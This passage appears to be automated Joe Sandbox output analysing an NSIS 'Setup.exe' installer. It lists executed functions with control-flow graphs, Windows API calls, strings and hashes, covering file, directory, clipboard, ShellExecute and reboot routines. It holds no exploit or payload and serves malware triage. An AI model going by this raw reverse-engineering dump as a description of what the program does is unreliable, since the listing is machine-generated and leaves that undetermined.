406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                  Executed Functions

                                                                                                                                  Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                    • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425979,74DF23A0,00000000), ref: 00406902
                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                  • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                  • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                  • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                  • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                  • String ID: New install of "%s" to "%s"${
                                                                                                                                  • API String ID: 2110491804-1641061399
                                                                                                                                  • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                  • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                  • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                  • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                  Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                  APIs
                                                                                                                                  • #17.COMCTL32 ref: 004038CE
                                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                    • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                    • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                    • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                  • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                  • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                  • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                  • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                  • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                  • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                  • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                  • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                  • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                  • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                  • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                  • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                  • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                  • API String ID: 2435955865-3712954417
                                                                                                                                  • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                  • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                  • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                  • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                  Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID: jF
                                                                                                                                  • API String ID: 2295610775-3349280890
                                                                                                                                  • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                  • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                  • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                  • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                  Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 310444273-0
                                                                                                                                  • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                  • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                  • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                  • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                  Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                  APIs
                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                  • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                  • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                  • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                  • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                  Strings
                                                                                                                                  • Rename: %s, xrefs: 004018F8
                                                                                                                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                  • Aborting: "%s", xrefs: 0040161D
                                                                                                                                  • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                  • BringToFront, xrefs: 004016BD
                                                                                                                                  • Sleep(%d), xrefs: 0040169D
                                                                                                                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                  • Jump: %d, xrefs: 00401602
                                                                                                                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
